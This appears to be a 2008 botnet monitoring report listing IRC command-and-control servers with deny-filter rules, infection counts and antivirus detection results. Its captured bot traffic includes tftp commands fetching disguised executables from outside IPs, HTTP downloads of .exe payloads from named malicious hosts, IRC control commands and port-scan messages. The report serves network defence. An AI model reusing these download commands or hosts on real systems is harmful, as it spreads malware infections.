Priority 36 TCP Ports 2345 Filter deny ip host 084.244.019.183 any log ! 35 infects 02/02/08 to 04/26/08 spray.net ISP spray network services ab
Clients 35 sweden Activity Domain spray.net
Chatter Example
  • Client: GET /mixit.exe HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Client: NICK NT50|44974485USER NT50|44974485 0 0 :NT50|44974485
  • Client: USERHOST NT50|44974485
  • Server: :NT50|44974485 MODE NT50|44974485 :+iw
  • Client: MODE NT50|44974485 +n+BJOIN #!MMT! Mixxx74USERHOST...

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGDropper.Generic.VMS
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureStartPage.awy
IkarusMISSED
KasperskyStartPage.awy
McAfeeMISSED
MicrosoftVirTool_CeeInject.gen!A
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1Banker
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 19 TCP Ports 2345 Filter deny ip host 084.244.019.254 any log ! 19 infects 02/17/08 to 04/23/08 spray.net ISP spray network services ab
Clients 19 sweden Activity Domain spray.net
Chatter Example
  • Client: GET /mumie.exe HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Client: NICK NT50|87617576USER NT50|87617576 0 0 :NT50|87617576
  • Client: USERHOST NT50|87617576
  • Server: :NT50|87617576 MODE NT50|87617576 :+iw
  • Client: MODE NT50|87617576 +n+BJOIN #!MUM! Mixxx74USERHOST...
  • Server: PONG :irc.x.com
  • Server: PONG :irc.x.com
  • Server: PONG :irc.x.com
  • Server: PONG :irc.x.com
  • Server: PONG :irc.x.com
  • Server: PONG :irc.x.com

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirIrcBot.56323.3
AuthentiumMISSED
AvastMISSED
AVGIrcbot.DRT
BitDefenderInject.GC
CAT-QuickHealHoax.Renos.fh.3
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetRbot.IWV
EwidoMISSED
FileAdvisorMISSED
FortinetIRCBot.CGE!tr.bdr
F-ProtMISSED
F-SecureIRCBot.cge
IkarusInject.GC
KasperskyIRCBot.cge
McAfeeMISSED
MicrosoftVirTool_CeeInject.gen!A
NOD32v2MISSED
NormanIrcbot.ABQQ
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMalEncPk-CX
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
VBA32MISSED
VirusBusterIRCBot.Gen
Webwasher
Gateway
IrcBot.56323.3
Priority 17 TCP Ports 3935 Filter deny ip host 069.042.216.122 any log ! 17 infects 01/07/08 to 01/14/08 awknet.com ISP awknet communications llc
Clients 17 united states Activity Domain awknet.com
Chatter Example
  • Client: USER 1
  • Server: 331 Password required
  • Client: PASS 1
  • Server: 230 User logged in.
  • Server: RETR microsoftFIX.exe
  • Server: 150 Opening BINARY mode data connection
  • Server: 221 Goodbye happy r00ting.
  • Client: NICK USA|16396USER iycvzv 0 0 :USA|16396
  • Server: :Irc.X.Net NOTICE AUTH :*** Looking up your hostname...
  • Server: :Irc.X.Net NOTICE AUTH :*** Couldn\\'t resolve your hostname;...
  • Client: USERHOST USA|16396
  • Client: MODE USA|16396 -x+RiJOIN #RpmXp# sendUSERHOST USA|16396MODE...
  • Server: PONG :Irc.X.Net
  • Server: PONG :Irc.X.Net
  • Server: PONG :Irc.X.Net
  • Server: PONG :Irc.X.Net
  • Server: PONG :Irc.X.Net
  • Server: PONG :Irc.X.Net
  • Server: PONG :Irc.X.Net
  • Server: PONG :Irc.X.Net
  • Server: PONG :Irc.X.Net

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirWORMRbot.Gen
AuthentiumMISSED
AvastMISSED
AVGRBot
BitDefenderMISSED
CAT-QuickHealSdBot.gen
ClamAVPUA.Packed.Themida
DrWebMISSED
eSafeRbot.etg
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtSpybot.QWA
F-SecureRbot.etg
IkarusGeneric.Sdbot
KasperskyRbot.etg
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanSDBot.gen8
PandaMISSED
Prevx1SdBot.gen
RisingMISSED
SophosMISSED
SunbeltVIPRE.Suspicious
SymantecMISSED
TheHackerBehav-Heuristic-064
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
Rbot.Gen
Priority 16 TCP Ports 9988 6677 Filter deny ip host 069.042.216.120 any log ! 16 infects 01/18/08 to 02/29/08 awknet.com ISP awknet communications llc
Clients 16 united states Activity Domain awknet.com
Chatter Example
  • Client: USER a
  • Client: PASS a
  • Server: RETR SADASDA.exe
  • Client: NICK h3x-ujyvuotUSER h3x-ujyvuot 0 0 :h3x-ujyvuot
  • Server: :Irc.h3x.Net NOTICE AUTH :*** Looking up your hostname...
  • Client: JOIN ##x## f
  • Server: :h3x-ujyvuot!h3x-ujyvuo@192.168.1.17 JOIN :##x##:Irc.h3x.Net 332...
  • Client: USERHOST h3x-ujyvuotJOIN ##x## fUSERHOST h3x-ujyvuotJOIN ##x##...
  • Server: PONG :Irc.h3x.Net
  • Server: PONG :Irc.h3x.Net
  • Server: PONG :Irc.h3x.Net
  • Server: PONG :Irc.h3x.Net
  • Server: PONG :Irc.h3x.Net
  • Server: PONG :Irc.h3x.Net

more....

BotClient Antivirus Diagnoses
AhnLab-V3Virut
AntiVirVirut.AO
AuthentiumVirut!Generic
Avast_Rbot-FGP
AVGVirut
BitDefenderVirtob.6.Gen
CAT-QuickHealVirut.U
ClamAVVirut-11
DrWebIRC.Sdbot.2159
eSafeMISSED
eTrust-VetVirut.6562
EwidoMISSED
FileAdvisorMISSED
FortinetVirut.AO
F-ProtVirut.6561.D
F-SecureVirut.AP
IkarusRbot.eix
KasperskyVirut.ao
McAfeeVirut.gen.a
MicrosoftVirut.X
NOD32v2Virut.AO
NormanVirut.AP
PandaVirutas.AB
Prevx1MISSED
RisingVirut.ae
SophosVirut-R
SunbeltVIPRE.Suspicious
SymantecVirut.W
TheHackerVirut.gen
VBA32Virut.ab
VirusBusterVirut.Gen.4
Webwasher
Gateway
Virut.AO
Priority 14 TCP Ports 1977 1977 85 Filter deny ip host 212.026.001.178 any log ! 14 infects 01/09/08 to 02/03/08 - ISP king fahd univ
Clients 14 saudi arabia Activity Domain -
Chatter Example
  • Client: NICK USA|2K|SP2|713789USER acrihmyg 0 0 :USA|2K|SP2|713789
  • Server: :mail.dcc.kfupm.edu.sa NOTICE AUTH :*** Looking up your...
  • Client: USERHOST USA|2K|SP2|713789
  • Client: MODE USA|2K|SP2|713789 +iu-xJOIN ##nhg## USERHOST...
  • Client: PRIVMSG ##nhg## :[SCAN]: Random Port Scan started on 10.x.x.x:135...
  • Server: :mail.dcc.kfupm.edu.sa 501 USA|2K|SP2|713789 :Unknown MODE flag
  • Client: PRIVMSG ##exp## :Bot killed and removed:...
  • Client: PRIVMSG ##exp## :Bot killed and removed:...
  • Server: :mail.dcc.kfupm.edu.sa 401 USA|2K|SP2|713789 ##exp## :No such...
  • Server: :mail.dcc.kfupm.edu.sa 401 USA|2K|SP2|713789 ##exp## :No such...
  • Server: PONG :mail.dcc.kfupm.edu.sa
  • Server: :NhG!NhG@Network-Administrator.a MODE ##nhg## +o NhG
  • Server: :NhG!NhG@Network-Administrator.a PRIVMSG ##nhg## :.downloadneox...
  • Server: PONG :mail.dcc.kfupm.edu.sa
  • Server: :NhG!NhG@Network-Administrator.a PRIVMSG ##nhg## :.neox nhg.nhg
  • Client: PRIVMSG ##nhg## :\\002n\\002z\\037m\\037 (irc.p\\037l\\037g)...
  • Server: :USA|XP|SP1|284556!nhlztxnp@86.55.169.149 PRIVMSG ##nhg##...
  • Server: :NhG!NhG@Network-Administrator.a PRIVMSG ##nhg## :.downloadneox...
  • Client: PRIVMSG ##nhg## :\\002n\\002z\\037m\\037 (download.p\\037l\\037g)...
  • Client: GET /neoxrulz/RX/rBot.exe HTTP/1.0User-Agent: Mozilla/4.0...
  • Client: PRIVMSG ##nhg## :\\002n\\002z\\037m\\037 (download.p\\037l\\037g)...
  • Server: :FRA|XP|SP1|418754!pbevwoj@41.221.18.180 PRIVMSG ##nhg##...
  • Client: PRIVMSG ##nhg## :\\002n\\002z\\037m\\037 (download.p\\037l\\037g)...
  • Server: :USA|XP|SP1|284556!nhlztxnp@86.55.169.149 PRIVMSG ##nhg##...
  • Server: NICK [NHG]-995278967USER ixhjzqzqt 0 0 :[NHG]-995278967
  • Server: :mail.dcc.kfupm.edu.sa NOTICE AUTH :*** Looking up your...
  • Client: USERHOST [NHG]-995278967
  • Client: MODE [NHG]-995278967 -x+iBJOIN ##nerez## USERHOST...
  • Server: :USA|XP|SP0|490833!zcptvd@192.168.1.129 PRIVMSG ##nhg##...
  • Client: PRIVMSG ##nerez## :[SCAN]: Random Port Scan started on...
  • Server: :ROM|XP|SP1|697840!ancbomr@89.137.180.152 PRIVMSG ##nhg##...
  • Client: PRIVMSG ##nerez## :[SCAN]: Random Port Scan started on...
  • Server: :FRA|XP|SP1|418754!pbevwoj@41.221.18.180 PRIVMSG ##nhg##...
  • Server: :[NHG]-893125029!kwzqrgsdkr@97.90.138.105 PRIVMSG ##nerez##...
  • Server: NICK [NHG]-613362153USER lealyhxhjo 0 0 :[NHG]-613362153
  • Server: NICK USA|2K|SP2|865094USER xqiqtist 0 0 :USA|2K|SP2|865094
  • Server: :mail.dcc.kfupm.edu.sa NOTICE AUTH :*** Looking up your...

more....

BotClient Antivirus Diagnoses
AhnLab-V3IRCBot.Gen
AntiVirRbot.328262
AuthentiumIrcbot.1!Generic
Avast_SdBot-gen44
AVGIRCBackDoor.SdBot
BitDefenderGeneric.Malware.G!FWX!!g.BB4F4726
CAT-QuickHealRbot.1470B0D04
ClamAVExploit.DCOM.Gen
DrWebHLLW.MyBot
eSafeMISSED
eTrust-VetRbot!generic
EwidoRbot.aeu
FileAdvisorMISSED
FortinetMISSED
F-ProtIrcbot.1!Generic
F-SecureRbot.aeu
IkarusRbot.aeu
KasperskyRbot.aeu
McAfeeSdbot.gen.g
MicrosoftExploit_Wmfap.A
NOD32v2MISSED
NormanMISSED
PandaGaobot.gen.worm
Prevx1MISSED
RisingRbot.GEN
SophosMalBehav-134
SunbeltMISSED
SymantecSpybot.Worm
TheHackerSdBot.gen
VBA32MISSED
VirusBusterRBot.Gen.13
Webwasher
Gateway
Rbot.210944
Priority 11 TCP Ports 2345 2345 66 Filter deny ip host 084.244.005.183 any log ! 11 infects 05/15/08 to 06/12/08 brimob.org ISP spray network services ab
Clients 11 sweden Activity Domain brimob.org
Chatter Example
  • Client: GET /vires.exe HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /vires.jpg HTTP/1.0User-Agent: Mozilla 1.02.45 bizHost:...
  • Client: NICK NT50|31225048USER NT50|31225048 0 0 :NT50|31225048
  • Client: USERHOST NT50|31225048
  • Server: :NT50|31225048 MODE NT50|31225048 :+iw
  • Client: MODE NT50|31225048 +n+BJOIN #!MU2! Mixxx74USERHOST...

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureMISSED
IkarusMISSED
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 9 TCP Ports 2345 Filter deny ip host 084.244.019.189 any log ! 9 infects 02/11/08 to 02/13/08 spray.net ISP spray network services ab
Clients 9 sweden Activity Domain spray.net
Chatter Example
  • Client: GET /mumie.exe HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Client: NICK NT50|76993234USER NT50|76993234 0 0 :NT50|76993234
  • Client: USERHOST NT50|76993234
  • Server: :NT50|76993234 MODE NT50|76993234 :+iw
  • Client: MODE NT50|76993234 +n+BJOIN #!MUM! Mixxx74USERHOST...

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureMISSED
IkarusMISSED
KasperskyHeur.Backdoor.Generic
McAfeeMISSED
MicrosoftVirTool_CeeInject.gen!A
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1Banker
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 8 TCP Ports 51115 51115 85 Filter deny ip host 069.050.208.003 any log ! 8 infects 04/21/08 to 05/06/08 bulletads.com ISP atjeu publishing llc
Clients 8 united states Activity Domain bulletads.com
Chatter Example
  • Client: USER 1
  • Server: 331 Password required
  • Client: PASS 1
  • Server: 230 User logged in.
  • Server: RETR spwls.exe
  • Server: 150 Opening BINARY mode data connection
  • Server: 221 Goodbye happy r00ting.
  • Client: NICK o2860677178836USER jqmqngpniqeaju 0 0 :o2860677178836
  • Client: USERHOST o2860677178836
  • Client: MODE o2860677178836 +iJOIN #mss2 mss2pass
  • Server: :o2860677178836 MODE o2860677178836...

more....

BotClient Antivirus Diagnoses
AhnLab-V3Virut.D
AntiVirVirut.R
AuthentiumVirut!Generic
Avast_Virut
AVGVirut
BitDefenderVirtob.4.Gen
CAT-QuickHealVirut.D
ClamAVVirut.Gen.C-16
DrWebVirut.5
eSafeVirut.gen
eTrust-VetVirut.10416
EwidoMISSED
FileAdvisorMISSED
FortinetVirut.F
F-ProtVirut.10416
F-SecureVirut.H
IkarusMalwareScope.Trojan-PWS.Game.17
KasperskyVirut.n
McAfeeVirut.gen
MicrosoftVirut.AH
NOD32v2Virut.NAJ
NormanSuspicious_N.gen
PandaVirutas.gen
Prevx1MISSED
RisingVirut.GEN
SophosVetor-A
SunbeltMISSED
SymantecVirut!gen
TheHackerVirut.gen2
VBA32Virut.f
VirusBusterVirut.Gen
Webwasher
Gateway
Virut.R
Priority 8 TCP Ports 51115 Filter deny ip host 069.050.209.031 any log ! 8 infects 04/23/08 to 05/07/08 bulletads.com ISP atjeu publishing llc
Clients 8 united states Activity Domain bulletads.com
Chatter Example
  • Client: USER 1
  • Server: 331 Password required
  • Client: PASS 1
  • Server: 230 User logged in.
  • Server: RETR cPaner.com
  • Server: 150 Opening BINARY mode data connection
  • Server: 221 Goodbye happy r00ting.
  • Client: NICK CcC-439407519USER paodsturruw 0 0 :CcC-439407519
  • Client: USERHOST CcC-439407519
  • Client: MODE CcC-439407519 +x+iJOIN #mss2 mss2pass
  • Server: :nze 501 CcC-439407519 :Unknown MODE flag:CcC-439407519 MODE...

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirSdBot.235520.5
AuthentiumMISSED
Avast_EggDrop-AC
AVGIRCBackDoor.SdBot4.AUG
BitDefenderSDBot.DFPI
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureMISSED
IkarusPakes
KasperskyBAT.Regger.b
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanSDBot.BNGB
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltVIPRE.Suspicious
SymantecMISSED
TheHackerMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
SdBot.235520.5
Priority 8 TCP Ports 6667 85 6668 Filter deny ip host 218.234.032.194 any log ! 8 infects 03/03/08 to 03/04/08 - ISP hananet-highban-aroinformationtech
Clients 8 korea_ republic of Activity Domain -
Chatter Example
  • Client: USER 1
  • Server: 331 Password required
  • Client: PASS 1
  • Server: 230 User logged in.
  • Server: RETR RooTsoft.com
  • Server: 150 Opening BINARY mode data connection
  • Server: 221 Goodbye happy r00ting.
  • Client: NICK SF2-146480552USER khpeqbkagf 0 0 :SF2-146480552
  • Client: USERHOST SF2-146480552
  • Client: MODE SF2-146480552 +x+iJOIN #dd dpassUSERHOST SF2-146480552MODE...
  • Server: NICK xykkowhjUSER z020500 . . :-
  • Client: Service Pack 2JOIN &virtu

more....

BotClient Antivirus Diagnoses
AhnLab-V3Virut.D
AntiVirVirut.Gen
AuthentiumVirut.9264
Avast_Virut
AVGIrcbot.7.AH
BitDefenderVirtob.3.Gen
CAT-QuickHealVirut.D
ClamAVMybot-7905
DrWebVirut.5
eSafeMISSED
eTrust-VetVirut.9276
EwidoMISSED
FileAdvisorMISSED
FortinetVirut.E
F-ProtVirut.9264
F-SecureVirut.BF
IkarusRbot.aus
KasperskyMISSED
McAfeeVirut.gen
MicrosoftVirut.AK
NOD32v2Virut.E
NormanVirut.BF
PandaMISSED
Prevx1MISSED
RisingVirut.GEN
SophosVirut-L
SunbeltVIPRE.Suspicious
SymantecMISSED
TheHackerVirut.f
VBA32Virut.3
VirusBusterVirut.Gen
Webwasher
Gateway
Virut.Gen
Priority 7 TCP Ports 8080 72 1863 10324 Filter deny ip host 067.043.236.066 any log ! 7 infects 04/12/08 to 06/29/08 synflood.ws ISP globotech communications
Clients 7 canada Activity Domain synflood.ws
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 99.250.219.254 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 99.250.219.254 get dllhost.exe wins\\DLLHOST.EXE

more....

BotClient Antivirus Diagnoses
AhnLab-V3IRCBot.variant
AntiVirBDSVanBot.AX.32
AuthentiumHeuristic-210!Eldorado
Avast_EggDrop-AE
AVGGeneric5.PZQ
BitDefenderAgent.YRG
CAT-QuickHealVanBot.ax
ClamAVSdBot-5592
DrWebIRC.Sdbot.2665
eSafeMISSED
eTrust-VetLinkbot!generic
EwidoPoeBot.o
FileAdvisorMISSED
FortinetPoebot.AX!tr.bdr
F-ProtHeuristic-210!Eldorado
F-SecureVanBot.ax
IkarusTrojan-Dropper.Small.YY
KasperskyVanBot.ax
McAfeeGeneric.dx
MicrosoftPoebot.gen
NOD32v2MISSED
NormanSuspicious_U.gen
PandaSdbot.JKV.worm
Prevx1MISSED
RisingVanBot.cw
SophosPoebot-KG
SunbeltVanbot
SymantecIRCbot
TheHackerBackdoorVanBot.ax
VBA32VanBot.dt
VirusBusterPoebot.BS
Webwasher
Gateway
VanBot.AX.32
Priority 7 TCP Ports 7000 Filter deny ip host 218.025.036.007 any log ! 7 infects 01/07/08 to 01/08/08 online.ln.cn ISP cncgroup liaoning province network
Clients 7 china Activity Domain online.ln.cn
Chatter Example
  • Client: USER a
  • Client: PASS a
  • Server: RETR msnnmaneger.exe
  • Client: PASS saad
  • Client: PASS saadNICK TAHY-pydofhUSER TAHY-pydofh 0 0 :TAHY-pydofh
  • Client: PASS saadNICK TAHY-pydofhUSER TAHY-pydofh 0 0 :TAHY-pydofh
  • Client: PASS saadNICK TAHY-pydofhUSER TAHY-pydofh 0 0 :TAHY-pydofh
  • Client: PASS saadNICK TAHY-pydofhUSER TAHY-pydofh 0 0 :TAHY-pydofh
  • Client: PASS saadNICK TAHY-pydofhUSER TAHY-pydofh 0 0 :TAHY-pydofh

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirTRCrypt.XPACK.Gen
AuthentiumMISSED
AvastMISSED
AVGRBot.AX
BitDefenderMISSED
CAT-QuickHealSdBot.gen
ClamAVPUA.Packed.Themida
DrWebMISSED
eSafeMISSED
eTrust-VetForBot.TW
EwidoMISSED
FileAdvisorMISSED
FortinetSDBot.FOG!tr.bdr
F-ProtMISSED
F-SecureKolab.m
IkarusGeneric.Sdbot
KasperskyKolab.m
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1DIMPY.WIN32VBSY.Q
RisingMISSED
SophosMISSED
SunbeltSDBot
SymantecSdbot
TheHackerBehav-Heuristic-064
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
Crypt.XPACK.Gen
Priority 6 TCP Ports 18067 Filter deny ip host 058.020.187.016 any log ! 6 infects 04/03/08 to 04/20/08 - ISP cnc group hunan province network
Clients 6 china Activity Domain -
Chatter Example
  • Client: USeR l l l l
  • Client: NiCK p7-0001dc90
  • Client: USeRHOST p7-0001dc90
  • Client: JOiN #p7 nsja5rqf
  • Server: :p7-0001dc90!l@192.168.1.8 JOIN :#p7:aaa.59712.com 353...

more....

BotClient Antivirus Diagnoses
AhnLab-V3IRCBot.variant
AntiVirMocbot.A
AuthentiumMocbot.A
Avast_Mocbot
AVGGeneric.RXC
BitDefenderMocbot.A
CAT-QuickHealMocbot.a
ClamAVMocbot.A
DrWebHot
eSafeMocbot.a
eTrust-VetEsbot.M
EwidoMocbot.a
FileAdvisorMISSED
FortinetMocbot!tr
F-ProtMocbot.A
F-SecureMalware
IkarusIM-Opanki.O
KasperskyMocbot.a
McAfeeIRC-Mocbot
MicrosoftMocbot.A
NOD32v2IRCBot.OO
NormanSuspicious_M.gen
PandaBckIRCBot.NT
Prevx1Generic.Malware
RisingMocbot.a
SophosCuebot-G
SunbeltMISSED
SymantecMocbot.A
TheHackerBackdoorMocbot.a
VBA32Mocbot.a
VirusBusterMocbot.A
Webwasher
Gateway
Mocbot.A
Priority 6 TCP Ports 7776 Filter deny ip host 220.128.233.154 any log ! 6 infects 01/09/08 to 02/01/08 hinet.net ISP chtd chunghwa telecom co. ltd
Clients 6 taiwan Activity Domain hinet.net
Chatter Example
  • Client: USER 1
  • Server: 331 Password required
  • Client: PASS 1
  • Server: 230 User logged in.
  • Server: RETR IsUninst.exe
  • Server: 150 Opening BINARY mode data connection
  • Server: 221 Goodbye happy r00ting.
  • Client: PASS _A159753
  • Client: NICK USA|13717USER wfcah 0 0 :USA|13717
  • Client: : USERID : UNIX : lvhrp
  • Server: PONG :1032973247
  • Client: JOIN #j00#
  • Client: JOIN #j00# USERHOST USA|13717MODE USA|13717 -x+iJOIN #j00#
  • Client: PRIVMSG #j00# :-\\0034\\002scan\\002\\003- Random Port Scan...

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
Avast_SdBot-gen44
AVGIRCBackDoor.SdBot3.XRP
BitDefenderGeneric.Sdbot.73574655
CAT-QuickHealMISSED
ClamAVMISSED
DrWebHLLW.MyBot.based
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetParite.fam
F-ProtMISSED
F-SecureRbot.gen
IkarusMalwareScope.Backdoor.Hupigon.1
KasperskyRbot.gen
McAfeeMISSED
MicrosoftExploit_RpcDcom.gen!MS03-039
NOD32v2MISSED
NormanHupigon.gen83
PandaMISSED
Prevx1MISSED
RisingRbot.GEN
SophosMalEncPk-AA
SunbeltVIPRE.Suspicious
SymantecMISSED
TheHackerMISSED
VBA32MISSED
VirusBusterPackedeXPressor
Webwasher
Gateway
Packer.Expressor
Priority 6 TCP Ports 18067 Filter deny ip host 222.051.025.090 any log ! 6 infects 05/12/08 to 05/30/08 herbalqc.com ISP china railway telecommunications center
Clients 6 china Activity Domain herbalqc.com
Chatter Example
  • Client: USeR l l l l
  • Client: USeR l l l lNiCK n1-0006cac5
  • Client: USeR l l l lNiCK n1-0006cac5
  • Client: USeR l l l lNiCK n1-0006cac5
  • Client: USeR l l l lNiCK n1-0006cac5
  • Client: USeR l l l lNiCK n1-0006cac5

more....

BotClient Antivirus Diagnoses
AhnLab-V3WargBot.9609
AntiVirIrcBot.9609
AuthentiumIrcbot.TU
Avast_Ircbot-ACE
AVGGeneric3.GBC
BitDefenderVanBot.A
CAT-QuickHealIRCBot.st
ClamAVIRCBot-689
DrWebHLLW.Nert
eSafeIRCBot.jl
eTrust-VetCuebot.J
EwidoIRCBot.st
FileAdvisorMISSED
FortinetGraweg.B!tr.bdr
F-ProtIrcbot.TU
F-SecureVanBot.a
IkarusIRCBot.st
KasperskyVanBot.a
McAfeeIRC-Mocbot!MS06-040
MicrosoftMocbot.A!CME-482
NOD32v2IRCBot.OO
NormanIrcbot.BVM
PandaOscarbot.KD.worm!CME-482
Prevx1MISSED
RisingMocbot.b
SophosCuebot-L
SunbeltIRC.Mocbot
SymantecWargbot
TheHackerExploit.MS06-040.b
VBA32IRCBot.st
VirusBusterIRCBot.AAH
Webwasher
Gateway
IrcBot.9609
Priority 6 TCP Ports 10324 Filter deny ip host 067.043.236.098 any log ! 6 infects 06/09/08 to 07/02/08 synflood.ws ISP globotech communications
Clients 6 canada Activity Domain synflood.ws
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 122.42.21.70 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 122.42.21.70 get dllhost.exe wins\\DLLHOST.EXE
  • Client: ...
  • Server: GET /
  • Server: GET /pub/ICQ_Win95_98_NT4/ICQ_4/Lite_Edition/icq4_setup.exe...
  • Server: GET /pub/ICQ_Win95_98_NT4/ICQ_4/Lite_Edition/icq4_setup.exe...
  • Client: USER ecvkbv ecvkbv ecvkbv :icjtiniemopoidod
  • Client: NICK pehKbHna
  • Client: MODE pehKbHna +xi
  • Client: JOIN #las6 USERHOST pehKbHna
  • Client: MODE #las6 +smntu
  • Server: :hub.54535.com 482 pehKbHna #las6 :You\\'re not channel operator
  • Client: MODE #rs2 +smntu
  • Server: :hub.54535.com 482 pehKbHna #rs2 :You\\'re not channel operator
  • Client: MODE #fox +smntu
  • Server: :hub.54535.com 482 pehKbHna #fox :You\\'re not channel operator
  • Server: GET /is2.exe HTTP/1.0Host: nadsam0.info
  • Server: GET /is.exe HTTP/1.0Host: nadsam0.info
  • Server: GET /is3.exe HTTP/1.0Host: nadsam0.info
  • Server: GET /rm.exe HTTP/1.0Host: nadsam0.info
  • Server: GET /kat.exe HTTP/1.0Host: nadsam0.info
  • Server: GET /xxx.exe HTTP/1.0Host: nadsam0.info
  • Server: PONG :hub.54535.com
  • Server: PONG :hub.54535.com

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureMISSED
IkarusMISSED
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 5 TCP Ports 18067 Filter deny ip host 121.254.173.070 any log ! 5 infects 01/17/08 to 02/13/08 kidc.net ISP korea internet data center inc
Clients 5 korea_ republic of Activity Domain kidc.net
Chatter Example
  • Client: USeR l l l l
  • Client: NiCK n1-00017828
  • Server: :x.x NOTICE n1-00017828 :*** If you are having problems...
  • Client: PoNG :81C26669
  • Client: USeRHOST n1-00017828
  • Client: JOiN #n1 nert4mp1
  • Server: :n1-00017828!l@192.168.1.97 JOIN :#n1:x.x 332 n1-00017828 #n1 :!e...
  • Client: GET /uploads/897c5a8d6f.jpg HTTP/1.0Accept: */*User-Agent:...

more....

BotClient Antivirus Diagnoses
AhnLab-V3WargBot.9609
AntiVirIrcBot.9609
AuthentiumIrcbot.TU
Avast_Ircbot-ACE
AVGGeneric3.GBC
BitDefenderVanBot.A
CAT-QuickHealIRCBot.st
ClamAVIRCBot-689
DrWebHLLW.Nert
eSafeIRCBot.jl
eTrust-VetCuebot.J
EwidoIRCBot.st
FileAdvisorMISSED
FortinetGraweg.B!tr.bdr
F-ProtIrcbot.TU
F-SecureVanBot.a
IkarusIRCBot.st
KasperskyVanBot.a
McAfeeIRC-Mocbot!MS06-040
MicrosoftMocbot.A!CME-482
NOD32v2IRCBot.OO
NormanIrcbot.BVM
PandaOscarbot.KD.worm!CME-482
Prevx1MISSED
RisingMocbot.b
SophosCuebot-L
SunbeltIRC.Mocbot
SymantecWargbot
TheHackerExploit.MS06-040.b
VBA32IRCBot.st
VirusBusterIRCBot.AAH
Webwasher
Gateway
IrcBot.9609
Priority 5 TCP Ports 10324 8080 67 Filter deny ip host 072.010.172.211 any log ! 5 infects 04/12/08 to 06/25/08 webdesignpro.org ISP globotech communications
Clients 5 canada Activity Domain webdesignpro.org
Chatter Example
  • Client: USER zsfkjx zsfkjx zsfkjx :tjlcdoikjtaofoew
  • Client: NICK TPTgDfif
  • Client: MODE TPTgDfif +xi
  • Client: JOIN #las6 USERHOST TPTgDfif
  • Client: MODE #las6 +smntu
  • Server: :hub.40684.com 482 TPTgDfif #las6 :You\\'re not channel operator
  • Client: MODE #rs2 +smntu
  • Server: :hub.40684.com 482 TPTgDfif #rs2 :You\\'re not channel operator
  • Client: MODE #fox +smntu
  • Client: GET /xxx.exe HTTP/1.0Host: nadsam0.info
